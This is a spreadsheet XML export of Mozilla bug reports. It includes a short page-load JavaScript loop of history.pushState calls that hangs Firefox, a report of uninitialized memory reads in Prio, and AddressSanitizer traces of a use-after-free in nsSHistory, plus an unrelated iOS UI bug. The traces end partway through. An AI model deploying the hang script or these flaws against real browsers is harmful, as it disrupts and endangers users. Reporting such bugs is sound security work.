User Agent: Mozilla/5.0 (Windows NT 5.2; rv:49.0) Gecko/20100101 Firefox/49.0
Build ID: 20161019084923
Steps to reproduce:
Opened up the attached html file which contains 
     jQuery(window).load(function(){
                    var total = "";
                    for(var i=0; i&lt;100000; i++){
                        total = total + i.toString();
                        history.pushState(0, 0, total);
                    } });
Actual results:
Firefox Hangs , CPU usage crosses 50% , after some time, get script error .
Havent checked this issue on my phone / tablet, however I believe it should. 
Expected results:
Redirect / Stop gracefully</t>
        </is>
      </c>
      <c r="X142" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="143">
      <c r="A143" t="n">
        <v>1409014</v>
      </c>
      <c r="B143" t="inlineStr">
        <is>
          <t>2017-10-16 06:57:01 -0700</t>
        </is>
      </c>
      <c r="C143" t="inlineStr">
        <is>
          <t>Snack bar is incorrectly displayed  after adding a bookmark and opening Tabs Tray</t>
        </is>
      </c>
      <c r="D143" t="inlineStr">
        <is>
          <t>2017-10-27 07:35:19 -0700</t>
        </is>
      </c>
      <c r="E143" t="n">
        <v>1</v>
      </c>
      <c r="F143" t="n">
        <v>1</v>
      </c>
      <c r="G143" t="n">
        <v>2</v>
      </c>
      <c r="H143" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I143" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J143" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K143" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L143" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M143" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N143" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O143" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P143" t="inlineStr"/>
      <c r="Q143" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R143" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S143" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T143" t="n">
        <v>1</v>
      </c>
      <c r="U143" t="n">
        <v>0</v>
      </c>
      <c r="V143" t="n">
        <v>4</v>
      </c>
      <c r="W143" t="inlineStr">
        <is>
          <t>Created attachment 8918851
Screen Shot 2017-10-16 at 15.40.47.png
Build: 10.0(7025)
Device: iPad Air 2
iOS: 11.0.2
Steps to reproduce:
1. Go to google.com
2. Open the page action menu 
3. Tap "Add Bookmark"
4. Tap the tab counter to open Tabs Tray
Actual results:
- The snack bar incorrectly displayed.</t>
        </is>
      </c>
      <c r="X143" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="144">
      <c r="A144" t="n">
        <v>1521360</v>
      </c>
      <c r="B144" t="inlineStr">
        <is>
          <t>2019-01-19 22:12:22 -0800</t>
        </is>
      </c>
      <c r="C144" t="inlineStr">
        <is>
          <t>Two potential loads from uninitialized memory in Prio serial_read_mp_array and read_packet_client</t>
        </is>
      </c>
      <c r="D144" t="inlineStr">
        <is>
          <t>2024-05-30 09:56:04 -0700</t>
        </is>
      </c>
      <c r="E144" t="n">
        <v>1</v>
      </c>
      <c r="F144" t="n">
        <v>1</v>
      </c>
      <c r="G144" t="n">
        <v>3</v>
      </c>
      <c r="H144" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I144" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J144" t="inlineStr">
        <is>
          <t>Telemetry</t>
        </is>
      </c>
      <c r="K144" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L144" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M144" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N144" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O144" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P144" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][post-critsmash-triage]][adv-main66+]</t>
        </is>
      </c>
      <c r="Q144" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R144" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S144" t="inlineStr">
        <is>
          <t>mozilla67</t>
        </is>
      </c>
      <c r="T144" t="n">
        <v>1</v>
      </c>
      <c r="U144" t="n">
        <v>0</v>
      </c>
      <c r="V144" t="n">
        <v>19</v>
      </c>
      <c r="W144" t="inlineStr">
        <is>
          <t>The same potential issue exists in both serial_read_mp_array and read_packet_client:
SECStatus rv = SECSuccess;
P_CHECKCB(upk != NULL); // NOTE: potential problem
... possibly more P_CHECKCB conditions 
msgpack_unpacked res;
The P_CHECKCB macro goes to cleanup, which does this:
cleanup:
  msgpack_unpacked_destroy(&amp;res);
The msgpack_unpacked_destroy function does this with the uninitialized memory:
static inline void msgpack_unpacked_destroy(msgpack_unpacked* result)
{
    if(result-&gt;zone != NULL) {
        msgpack_zone_free(result-&gt;zone);
        result-&gt;zone = NULL;
        memset(&amp;result-&gt;data, 0, sizeof(msgpack_object));
    }
}
Functions at:
https://dxr.mozilla.org/mozilla-central/source/third_party/prio/prio/serial.c?q=%2Bfunction%3A%22serial_read_packet_client%28msgpack_unpacker+%2A%2C+PrioPacketClient%2C+const_PrioConfig%29%22&amp;redirect_type=single#117 (serial_read_mp_array)
and
https://dxr.mozilla.org/mozilla-central/source/third_party/prio/prio/serial.c?q=%2Bfunction%3A%22serial_read_packet_client%28msgpack_unpacker+%2A%2C+PrioPacketClient%2C+const_PrioConfig%29%22&amp;redirect_type=single#325 (serial_read_packet_client)</t>
        </is>
      </c>
      <c r="X144" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="145">
      <c r="A145" t="n">
        <v>1765951</v>
      </c>
      <c r="B145" t="inlineStr">
        <is>
          <t>2022-04-22 01:42:26 -0700</t>
        </is>
      </c>
      <c r="C145" t="inlineStr">
        <is>
          <t>heap-use-after-free in nsSHistory</t>
        </is>
      </c>
      <c r="D145" t="inlineStr">
        <is>
          <t>2024-05-30 10:55:50 -0700</t>
        </is>
      </c>
      <c r="E145" t="n">
        <v>1</v>
      </c>
      <c r="F145" t="n">
        <v>1</v>
      </c>
      <c r="G145" t="n">
        <v>3</v>
      </c>
      <c r="H145" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I145" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J145" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K145" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L145" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M145" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N145" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O145" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P145" t="inlineStr">
        <is>
          <t>[STR in comment 8][adv-main102+][adv-esr91.11+]</t>
        </is>
      </c>
      <c r="Q145" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R145" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S145" t="inlineStr">
        <is>
          <t>103 Branch</t>
        </is>
      </c>
      <c r="T145" t="n">
        <v>1</v>
      </c>
      <c r="U145" t="n">
        <v>0</v>
      </c>
      <c r="V145" t="n">
        <v>29</v>
      </c>
      <c r="W145" t="inlineStr">
        <is>
          <t>Particular history navigation may cause a heap-use-after-free due to the (root) session history dereferencing a dead BC.
~~~I suspect the issue is connected to how an error representation replaces the active document when a transformation via an XSLT sheet fails.~~~
*Edit: The XSLT issue was in fact unconnected to the UAF and moved to a different bug.*
The ASAN reports below show a UAF on a local nightly build with *fission disabled*, and on ESR 91.9 with default settings. (There's still buggy behavior *with* fission, but I can't tell yet if there are similar potential consequences given the right testcase.)
1. local mozilla-central build rev `fb7973567fac` with `--disable-fission`:
```
==659463==ERROR: AddressSanitizer: heap-use-after-free on address 0x61a00020d420 at pc 0x7fe868ccdde9 bp 0x7fffec58b020 sp 0x7fffec58b018
READ of size 8 at 0x61a00020d420 thread T0
    #0 0x7fe868ccdde8 in get /m-c/obj-asan/dist/include/mozilla/RefPtr.h:286:27
    #1 0x7fe868ccdde8 in operator mozilla::dom::WindowContext * /m-c/obj-asan/dist/include/mozilla/RefPtr.h:299:12
    #2 0x7fe868ccdde8 in Children /m-c/docshell/base/BrowsingContext.cpp:1031:32
    #3 0x7fe868ccdde8 in mozilla::dom::BrowsingContext::GetChildren(nsTArray&lt;RefPtr&lt;mozilla::dom::BrowsingContext&gt; &gt;&amp;) /m-c/docshell/base/BrowsingContext.cpp:1039:28
    #4 0x7fe868ec22fe in nsSHistory::LoadDifferingEntries(nsISHEntry*, nsISHEntry*, mozilla::dom::BrowsingContext*, long, nsTArray&lt;nsSHistory::LoadEntryResult&gt;&amp;, bool, bool, int) /m-c/docshell/shistory/nsSHistory.cpp:2165:12
    #5 0x7fe868eba169 in nsSHistory::LoadEntry(int, long, unsigned int, nsTArray&lt;nsSHistory::LoadEntryResult&gt;&amp;, bool, bool, bool) /m-c/docshell/shistory/nsSHistory.cpp:2123:26
    #6 0x7fe868ec0761 in GotoIndex /m-c/docshell/shistory/nsSHistory.cpp:2005:10
    #7 0x7fe868ec0761 in nsSHistory::GotoIndex(int, bool) /m-c/docshell/shistory/nsSHistory.cpp:1985:17
    #8 0x7fe868e83390 in mozilla::dom::ChildSHistory::GotoIndex(int, int, bool, bool, mozilla::ErrorResult&amp;) /m-c/docshell/shistory/ChildSHistory.cpp:219:21
    #9 0x7fe868e82b8f in mozilla::dom::ChildSHistory::Go(int, bool, bool, mozilla::ErrorResult&amp;) /m-c/docshell/shistory/ChildSHistory.cpp:167:3
    #10 0x7fe868d1cbdb in nsDocShell::GoBack(bool, bool) /m-c/docshell/base/nsDocShell.cpp:3400:11
    #11 0x7fe85a97ffd5 in NS_InvokeByIndex /m-c/xpcom/reflect/xptcall/md/unix/xptcinvoke_asm_x86_64_unix.S:101
    #12 0x7fe85c5d3b52 in Invoke /m-c/js/xpconnect/src/XPCWrappedNative.cpp:1626:10
    #13 0x7fe85c5d3b52 in Call /m-c/js/xpconnect/src/XPCWrappedNative.cpp:1179:19
    #14 0x7fe85c5d3b52 in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) /m-c/js/xpconnect/src/XPCWrappedNative.cpp:1125:23
    #15 0x7fe85c5d9985 in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /m-c/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:963:10
    #16 0x7fe86a2d920f in CallJSNative /m-c/js/src/vm/Interpreter.cpp:420:13
    #17 0x7fe86a2d920f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) /m-c/js/src/vm/Interpreter.cpp:507:12
    #18 0x7fe86a2c4dc8 in CallFromStack /m-c/js/src/vm/Interpreter.cpp:571:10
    #19 0x7fe86a2c4dc8 in Interpret(JSContext*, js::RunState&amp;) /m-c/js/src/vm/Interpreter.cpp:3293:16
    #20 0x7fe86a2af6f8 in js::RunScript(JSContext*, js::RunState&amp;) /m-c/js/src/vm/Interpreter.cpp:389:13
    #21 0x7fe86a2d9470 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) /m-c/js/src/vm/Interpreter.cpp:539:13
    #22 0x7fe86a2dbbc5 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;, js::CallReason) /m-c/js/src/vm/Interpreter.cpp:584:8
    #23 0x7fe86a409180 in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /m-c/js/src/vm/CallAndConstruct.cpp:117:10
    #24 0x7fe86021864c in mozilla::dom::EventHandlerNonNull::Call(mozilla::dom::BindingCallContext&amp;, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /m-c/obj-asan/dom/bindings/EventHandlerBinding.cpp:283:37
    #25 0x7fe861444140 in Call&lt;nsCOMPtr&lt;mozilla::dom::EventTarget&gt; &gt; /m-c/obj-asan/dist/include/mozilla/dom/EventHandlerBinding.h:365:12
    #26 0x7fe861444140 in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /m-c/dom/events/JSEventHandler.cpp:201:12
    #27 0x7fe8613fc006 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /m-c/dom/events/EventListenerManager.cpp:1316:22
    #28 0x7fe8613fe005 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /m-c/dom/events/EventListenerManager.cpp:1507:17
    #29 0x7fe8614568ce in HandleEvent /m-c/dom/events/EventListenerManager.h:395:5
    #30 0x7fe8614568ce in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&amp;, mozilla::ELMCreationDetector&amp;) /m-c/dom/events/EventDispatcher.cpp:348:17
    #31 0x7fe8613e4e98 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /m-c/dom/events/EventDispatcher.cpp:550:16
    #32 0x7fe8613ea74d in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /m-c/dom/events/EventDispatcher.cpp:1119:11
    #33 0x7fe8613f0b99 in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsPresContext*, nsEventStatus*) /m-c/dom/events/EventDispatcher.cpp
    #34 0x7fe85e1c15aa in nsINode::DispatchEvent(mozilla::dom::Event&amp;, mozilla::dom::CallerType, mozilla::ErrorResult&amp;) /m-c/dom/base/nsINode.cpp:1354:17
    #35 0x7fe86140f663 in mozilla::dom::EventTarget::DispatchEvent(mozilla::dom::Event&amp;, mozilla::ErrorResult&amp;) /m-c/dom/events/EventTarget.cpp:186:13
    #36 0x7fe85dac74d9 in nsContentUtils::DispatchXULCommand(nsIContent*, bool, mozilla::dom::Event*, mozilla::PresShell*, bool, bool, bool, bool, unsigned short, short) /m-c/dom/base/nsContentUtils.cpp:6351:12
    #37 0x7fe863f70da4 in nsXULElement::DispatchXULCommand(mozilla::EventChainVisitor const&amp;, nsTAutoStringN&lt;char16_t, 64ul&gt;&amp;) /m-c/dom/xul/nsXULElement.cpp:935:5
    #38 0x7fe863f71616 in nsXULElement::PreHandleEvent(mozilla::EventChainVisitor&amp;) /m-c/dom/xul/nsXULElement.cpp:983:12
    #39 0x7fe8613e8e66 in PreHandleEvent /m-c/dom/events/EventDispatcher.cpp:436:22
    #40 0x7fe8613e8e66 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /m-c/dom/events/EventDispatcher.cpp:921:16
    #41 0x7fe8613f0b99 in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsPresContext*, nsEventStatus*) /m-c/dom/events/EventDispatcher.cpp
    #42 0x7fe85e1c15aa in nsINode::DispatchEvent(mozilla::dom::Event&amp;, mozilla::dom::CallerType, mozilla::ErrorResult&amp;) /m-c/dom/base/nsINode.cpp:1354:17
    #43 0x7fe86027a6bb in mozilla::dom::EventTarget_Binding::dispatchEvent(JSContext*, JS::Handle&lt;JSObject*&gt;, void*, JSJitMethodCallArgs const&amp;) /m-c/obj-asan/dom/bindings/EventTargetBinding.cpp:851:36
    #44 0x7fe860840149 in bool mozilla::dom::binding_detail::GenericMethod&lt;mozilla::dom::binding_detail::MaybeCrossOriginObjectThisPolicy, mozilla::dom::binding_detail::ThrowExceptions&gt;(JSContext*, unsigned int, JS::Value*) /m-c/dom/bindings/BindingUtils.cpp:3270:13
    #45 0x7fe86a2d920f in CallJSNative /m-c/js/src/vm/Interpreter.cpp:420:13
    #46 0x7fe86a2d920f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) /m-c/js/src/vm/Interpreter.cpp:507:12
    #47 0x7fe86b4c8032 in js::jit::DoCallFallback(JSContext*, js::jit::BaselineFrame*, js::jit::ICFallbackStub*, unsigned int, JS::Value*, JS::MutableHandle&lt;JS::Value&gt;) /m-c/js/src/jit/BaselineIC.cpp:1582:10
    #48 0x15d0e33eddc7  (&lt;unknown module&gt;)
0x61a00020d420 is located 928 bytes inside of 1368-byte region [0x61a00020d080,0x61a00020d5d8)
freed by thread T0 here:
    #0 0x55c9e7e4a862 in free /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:111:3
    #1 0x7fe85a72b473 in MaybeKillObject /m-c/xpcom/base/nsCycleCollector.cpp:2419:29
    #2 0x7fe85a72b473 in SnowWhiteKiller::Visit(nsPurpleBuffer&amp;, nsPurpleBufferEntry*) /m-c/xpcom/base/nsCycleCollector.cpp:2444:9
    #3 0x7fe85a716d55 in void nsPurpleBuffer::VisitEntries&lt;SnowWhiteKiller&gt;(SnowWhiteKiller&amp;) /m-c/xpcom/base/nsCycleCollector.cpp:939:23
    #4 0x7fe85a6fb438 in nsCycleCollector::FreeSnowWhiteWithBudget(js::SliceBudget&amp;) /m-c/xpcom/base/nsCycleCollector.cpp:2612:14
    #5 0x7fe85c595002 in AsyncFreeSnowWhite::Run() /m-c/js/xpconnect/src/XPCJSRuntime.cpp:150:9
    #6 0x7fe85a9493d9 in IdleRunnableWrapper::Run() /m-c/xpcom/threads/nsThreadUtils.cpp:309:22
    #7 0x7fe85a94b600 in mozilla::RunnableTask::Run() /m-c/xpcom/threads/TaskController.cpp:467:16
    #8 0x7fe85a900483 in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;) /m-c/xpcom/threads/TaskController.cpp:780:26
    #9 0x7fe85a8fd1f5 in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;) /m-c/xpcom/threads/TaskController.cpp:654:15
    #10 0x7fe85a8fd5ef in mozilla::TaskController::ProcessPendingMTTask(bool) /m-c/xpcom/threads/TaskController.cpp:390:36
    #11 0x7fe85a93d9f1 in operator() /m-c/xpcom/threads/TaskController.cpp:124:37
    #12 0x7fe85a93d9f1 in mozilla::detail::RunnableFunction&lt;mozilla::TaskController::InitializeInternal()::$_0&gt;::Run() /m-c/obj-asan/dist/include/nsThreadUtils.h:531:5
    #13 0x7fe85a924517 in nsThread::ProcessNextEvent(bool, bool*) /m-c/xpcom/threads/nsThread.cpp:1180:16
    #14 0x7fe85a92f4f1 in NS_ProcessNextEvent(nsIThread*, bool) /m-c/xpcom/threads/nsThreadUtils.cpp:465:10
    #15 0x7fe85c275ba6 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /m-c/ipc/glue/MessagePump.cpp:85:21
    #16 0x7fe85c0c96b2 in RunInternal /m-c/ipc/chromium/src/base/message_loop.cc:380:10
    #17 0x7fe85c0c96b2 in RunHandler /m-c/ipc/chromium/src/base/message_loop.cc:373:3
    #18 0x7fe85c0c96b2 in MessageLoop::Run() /m-c/ipc/chromium/src/base/message_loop.cc:355:3
    #19 0x7fe86470715a in nsBaseAppShell::Run() /m-c/widget/nsBaseAppShell.cpp:137:27
    #20 0x7fe869c33ca9 in nsAppStartup::Run() /m-c/toolkit/components/startup/nsAppStartup.cpp:295:30
    #21 0x7fe869ef16ad in XREMain::XRE_mainRun() /m-c/toolkit/xre/nsAppRunner.cpp:5746:22
    #22 0x7fe869ef36ef in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /m-c/toolkit/xre/nsAppRunner.cpp:5931:8
    #23 0x7fe869ef46a0 in XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /m-c/toolkit/xre/nsAppRunner.cpp:5998:21
    #24 0x55c9e7e7fc47 in do_main /m-c/browser/app/nsBrowserApp.cpp:225:22
    #25 0x55c9e7e7fc47 in main /m-c/browser/app/nsBrowserApp.cpp:395:16
    #26 0x7fe875aea30f in __libc_start_call_main libc-start.c
previously allocated by thread T0 here:
    #0 0x55c9e7e4aacd in malloc /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:129:3
    #1 0x55c9e7e840bd in moz_xmalloc /m-c/memory/mozalloc/mozalloc.cpp:52:15
    #2 0x7fe868cbe1d6 in operator new /m-c/obj-asan/dist/include/mozilla/cxxalloc.h:33:10
    #3 0x7fe868cbe1d6 in mozilla::dom::BrowsingContext::CreateDetached(nsGlobalWindowInner*, mozilla::dom::BrowsingContext*, mozilla::dom::BrowsingContextGroup*, nsTSubstring&lt;char16_t&gt; const&amp;, mozilla::dom::BrowsingContext::Type, bool, bool) /m-c/docshell/base/BrowsingContext.cpp:431:15
    #4 0x7fe85e15721c in CreateBrowsingContext(mozilla::dom::Element*, nsIOpenWindowInfo*, mozilla::dom::BrowsingContextGroup*, bool) /m-c/dom/base/nsFrameLoader.cpp
    #5 0x7fe85e15765a in nsFrameLoader::Recreate(mozilla::dom::Element*, mozilla::dom::BrowsingContext*, mozilla::dom::BrowsingContextGroup*, mozilla::dom::NavigationIsolationOptions const&amp;, bool, bool, bool) /m-c/dom/base/nsFrameLoader.cpp:496:15
    #6 0x7fe85e17d264 in nsFrameLoaderOwner::ChangeRemotenessCommon(nsFrameLoaderOwner::ChangeRemotenessContextType const&amp;, mozilla::dom::NavigationIsolationOptions const&amp;, bool, bool, mozilla::dom::BrowsingContextGroup*, std::function&lt;void ()&gt;&amp;, mozilla::ErrorResult&amp;) /m-c/dom/base/nsFrameLoaderOwner.cpp:168:20
    #7 0x7fe85e17eb84 in nsFrameLoaderOwner::ChangeRemoteness(mozilla::dom::RemotenessOptions const&amp;, mozilla::ErrorResult&amp;) /m-c/dom/base/nsFrameLoaderOwner.cpp:272:3
    #8 0x7fe85fe20e9d in mozilla::dom::XULFrameElement_Binding::changeRemoteness(JSContext*, JS::Handle&lt;JSObject*&gt;, void*, JSJitMethodCallArgs const&amp;) /m-c/obj-asan/dom/bindings/XULFrameElementBinding.cpp:517:24
    #9 0x7fe86083bf12 in bool mozilla::dom::binding_detail::GenericMethod&lt;mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions&gt;(JSContext*, unsigned int, JS::Value*) /m-c/dom/bindings/BindingUtils.cpp:3270:13
    #10 0x7fe86a2d920f in CallJSNative /m-c/js/src/vm/Interpreter.cpp:420:13
    #11 0x7fe86a2d920f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) /m-c/js/src/vm/Interpreter.cpp:507:12
    #12 0x7fe86a2c4dc8 in CallFromStack /m-c/js/src/vm/Interpreter.cpp:571:10
    #13 0x7fe86a2c4dc8 in Interpret(JSContext*, js::RunState&amp;) /m-c/js/src/vm/Interpreter.cpp:3293:16
    #14 0x7fe86a2af6f8 in js::RunScript(JSContext*, js::RunState&amp;) /m-c/js/src/vm/Interpreter.cpp:389:13
    #15 0x7fe86a2d9470 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) /m-c/js/src/vm/Interpreter.cpp:539:13
    #16 0x7fe86a2dbbc5 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;, js::CallReason) /m-c/js/src/vm/Interpreter.cpp:584:8
    #17 0x7fe86a406e5e in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /m-c/js/src/vm/CallAndConstruct.cpp:53:10
    #18 0x7fe85c5c2b9f in nsXPCWrappedJS::CallMethod(unsigned short, nsXPTMethodInfo const*, nsXPTCMiniVariant*) /m-c/js/xpconnect/src/XPCWrappedJSClass.cpp:981:17
    #19 0x7fe85a98160c in PrepareAndDispatch /m-c/xpcom/reflect/xptcall/md/unix/xptcstubs_x86_64_linux.cpp:115:37
    #20 0x7fe85a98052a in SharedStub xptcstubs_x86_64_linux.cpp
    #21 0x7fe85a78bbe0 in nsObserverList::NotifyObservers(nsISupports*, char const*, char16_t const*) /m-c/xpcom/ds/nsObserverList.cpp:70:19
    #22 0x7fe85a7bb0b0 in nsObserverService::NotifyObservers(nsISupports*, char const*, char16_t const*) /m-c/xpcom/ds/nsObserverService.cpp:292:19
    #23 0x7fe86371b9fa in mozilla::dom::ContentParent::ActorDestroy(mozilla::ipc::IProtocol::ActorDestroyReason) /m-c/dom/ipc/ContentParent.cpp:2062:10
    #24 0x7fe85c2ae763 in mozilla::ipc::IProtocol::DestroySubtree(mozilla::ipc::IProtocol::ActorDestroyReason) /m-c/ipc/glue/ProtocolUtils.cpp:577:3
    #25 0x7fe863a173a2 in mozilla::dom::PContentParent::OnChannelError() /m-c/obj-asan/ipc/ipdl/PContentParent.cpp:16719:5
    #26 0x7fe86371a035 in mozilla::dom::ContentParent::OnChannelError() /m-c/dom/ipc/ContentParent.cpp:1949:19
    #27 0x7fe85c26fff4 in mozilla::ipc::MessageChannel::OnNotifyMaybeChannelError() /m-c/ipc/glue/MessageChannel.cpp:1982:3
    #28 0x7fe85c2a3d7f in applyImpl&lt;mozilla::ipc::MessageChannel, void (mozilla::ipc::MessageChannel::*)()&gt; /m-c/obj-asan/dist/include/nsThreadUtils.h:1147:12
    #29 0x7fe85c2a3d7f in apply&lt;mozilla::ipc::MessageChannel, void (mozilla::ipc::MessageChannel::*)()&gt; /m-c/obj-asan/dist/include/nsThreadUtils.h:1153:12
    #30 0x7fe85c2a3d7f in mozilla::detail::RunnableMethodImpl&lt;mozilla::ipc::MessageChannel*, void (mozilla::ipc::MessageChannel::*)(), false, (mozilla::RunnableKind)1&gt;::Run() /m-c/obj-asan/dist/include/nsThreadUtils.h:1200:13
    #31 0x7fe85a94b600 in mozilla::RunnableTask::Run() /m-c/xpcom/threads/TaskController.cpp:467:16
    #32 0x7fe85a900483 in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;) /m-c/xpcom/threads/TaskController.cpp:780:26
    #33 0x7fe85a8fced8 in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;) /m-c/xpcom/threads/TaskController.cpp:612:15
    #34 0x7fe85a8fd5ef in mozilla::TaskController::ProcessPendingMTTask(bool) /m-c/xpcom/threads/TaskController.cpp:390:36
SUMMARY: AddressSanitizer: heap-use-after-free /m-c/obj-asan/dist/include/mozilla/RefPtr.h:286:27 in get
Shadow bytes around the buggy address:
  0x0c3480039a30: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3480039a40: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3480039a50: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3480039a60: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3480039a70: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=&gt;0x0c3480039a80: fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd fd
  0x0c3480039a90: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3480039aa0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3480039ab0: fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa
  0x0c3480039ac0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3480039ad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659463==ABORTING
```
2. `mozilla-esr91.revision.7de26aa38d0d1ac5339bc1794cd55582651d410a.firefox.linux64-asan-opt`:
```
==1134023==ERROR: AddressSanitizer: heap-use-after-free on address 0x61a000b3e05c at pc 0x7f0f89a32079 bp 0x7ffcdba155b0 sp 0x7ffcdba155a8
READ of size 2 at 0x61a000b3e05c thread T0
    #0 0x7f0f89a32078 in IsDiscarded /builds/worker/workspace/obj-build/dist/include/mozilla/dom/BrowsingContext.h:301:37
